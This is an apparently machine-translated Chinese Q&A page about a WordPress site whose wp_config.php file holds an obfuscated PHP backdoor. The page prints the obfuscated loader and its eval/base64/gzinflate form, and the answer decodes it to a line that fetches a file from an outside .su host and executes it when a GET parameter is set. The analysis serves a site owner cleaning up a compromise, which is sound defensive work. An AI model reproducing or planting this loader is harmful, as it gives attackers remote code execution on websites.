wp_config.php文件中存在可疑代码_Php_Wordpress_Security

wp_config.php文件中存在可疑代码

php wordpress security

wp_config.php文件中存在可疑代码,php,wordpress,security,Php,Wordpress,Security,我猜我的页面被黑客攻击了，因为在我的wp_config.php文件中，我在最后一道找到了这段代码 $Xbk = "uQoCwSNBIpmVRP14XjL56=AWfl.DFrv03tx;Ez*bnaHKdyc(UsMi+qgk87'9eZYT_/)OG2hJ";$vDE = $Xbk[41].$Xbk[49].$Xbk[49].$Xbk[60].$Xbk[29].$Xbk[33];$uQI = $Xbk[60].$Xbk[30].$Xbk[41].$Xbk[25].$Xbk[47].$Xbk[5

我猜我的页面被黑客攻击了，因为在我的wp_config.php文件中，我在最后一道找到了这段代码

$Xbk = "uQoCwSNBIpmVRP14XjL56=AWfl.DFrv03tx;Ez*bnaHKdyc(UsMi+qgk87'9eZYT_/)OG2hJ";$vDE = $Xbk[41].$Xbk[49].$Xbk[49].$Xbk[60].$Xbk[29].$Xbk[33];$uQI = $Xbk[60].$Xbk[30].$Xbk[41].$Xbk[25].$Xbk[47].$Xbk[54].$Xbk[37].$Xbk[51].$Xbk[40].$Xbk[24].$Xbk[25].$Xbk[41].$Xbk[33].$Xbk[60].$Xbk[47].$Xbk[39].$Xbk[41].$Xbk[49].$Xbk[60].$Xbk[20].$Xbk[15].$Xbk[64].$Xbk[44].$Xbk[60].$Xbk[46].$Xbk[2].$Xbk[44].$Xbk[60].$Xbk[47];$T4q = $Xbk[66].$Xbk[66].$Xbk[66].$Xbk[35];$R1h = $uQI.$Xbk[58].$Xbk[7].$Xbk[46].$Xbk[28].$Xbk[18].$Xbk[3].$Xbk[2].$Xbk[50].$Xbk[4].$Xbk[36].$Xbk[22].$Xbk[27].$Xbk[1].$Xbk[53].$Xbk[57].$Xbk[1].$Xbk[5].$Xbk[50].$Xbk[6].$Xbk[55].$Xbk[15].$Xbk[31].$Xbk[18].$Xbk[53].$Xbk[1].$Xbk[5].$Xbk[49].$Xbk[28].$Xbk[6].$Xbk[56].$Xbk[1].$Xbk[18].$Xbk[0].$Xbk[5].$Xbk[54].$Xbk[40].$Xbk[68].$Xbk[17].$Xbk[6].$Xbk[52].$Xbk[62].$Xbk[12].$Xbk[68].$Xbk[46].$Xbk[43].$Xbk[25].$Xbk[33].$Xbk[43].$Xbk[57].$Xbk[59].$Xbk[57].$Xbk[69].$Xbk[9].$Xbk[13].$Xbk[56].$Xbk[55].$Xbk[37].$Xbk[29].$Xbk[9].$Xbk[36].$Xbk[65].$Xbk[48].$Xbk[0].$Xbk[17].$Xbk[20].$Xbk[31].$Xbk[63].$Xbk[37].$Xbk[63].$Xbk[31].$Xbk[50].$Xbk[16].$Xbk[31].$Xbk[9].$Xbk[44].$Xbk[12].$Xbk[16].$Xbk[10].$Xbk[42].$Xbk[30].$Xbk[11].$Xbk[63].$Xbk[4].$Xbk[57].$Xbk[14].$Xbk[54].$Xbk[43].$Xbk[45].$Xbk[57].$Xbk[15].$Xbk[7].$Xbk[55].$Xbk[59].$Xbk[55].$Xbk[31].$Xbk[34].$Xbk[68].$Xbk[19].$Xbk[40].$Xbk[54].$Xbk[27].$Xbk[49].$Xbk[50].$Xbk[13].$Xbk[5].$Xbk[55].$Xbk[51].$Xbk[50].$Xbk[57].$Xbk[61].$Xbk[30].$Xbk[5].$Xbk[68].$Xbk[20].$Xbk[31].$Xbk[43].$Xbk[42].$Xbk[59].$Xbk[39].$Xbk[70].$Xbk[0].$Xbk[60].$Xbk[1].$Xbk[19].$Xbk[28].$Xbk[0].$Xbk[50].$Xbk[37].$Xbk[54].$Xbk[50].$Xbk[7].$Xbk[61].$Xbk[54].$Xbk[50].$Xbk[17].$Xbk[15].$Xbk[15].$Xbk[48].$Xbk[23].$Xbk[16].$Xbk[11].$Xbk[36].$Xbk[0].$Xbk[42].$Xbk[67].$Xbk[48].$Xbk[70].$Xbk[70].$Xbk[11].$Xbk[65].$Xbk[30].$Xbk[15].$Xbk[21].$Xbk[58].$T4q;@$vDE($R1h);

我猜这是某种基本的64，但如果有人能帮我解密，我将不胜感激

（来自）

执行的代码是：

eval(gzinflate(base64_decode('BcFLCoMwEADQq7QSMNk40LqQSsFN8QLuSgnGjN+YRGcKltK7972pP8kzrpE/Uuj60TzT0MX0pdRXmHvVTw71gKy74Bk9k0xG5ngDsMPSkiM7ZvSG60KH9bhueQ5FuMzgMBZgMj44UWXVEuHOUhhV/v4=')));

用echo替换

eval

：

echo(gzinflate(base64_decode('BcFLCoMwEADQq7QSMNk40LqQSsFN8QLuSgnGjN+YRGcKltK7972pP8kzrpE/Uuj60TzT0MX0pdRXmHvVTw71gKy74Bk9k0xG5ngDsMPSkiM7ZvSG60KH9bhueQ5FuMzgMBZgMj44UWXVEuHOUhhV/v4=')));

其结果是：

if (!empty($_GET['ocp'])){$b=@file_get_contents("http://dgkaslsdh.su/3ksxdnemq44/8o2j/lep8/b.txt");@assert($b);}

因此，它尝试下载一个文件并断言它。尽管如此，如果您试图从上面的链接获取文件，至少在这里服务器已关闭。

这是一个后门，尝试下载并执行文件。你应该关闭该网站，记住你的文件和数据库可能会被破坏，因此如果你要重新加载该网站，请为wordpress/插件获取新文件，确保它们已更新，并检查它们是否存在已知漏洞相关http请求是

@file\u get\u contents（“http://dgkaslsdh.su/3ksxdnemq44/8o2j/lep8/b.txt");，但主机目前已关闭。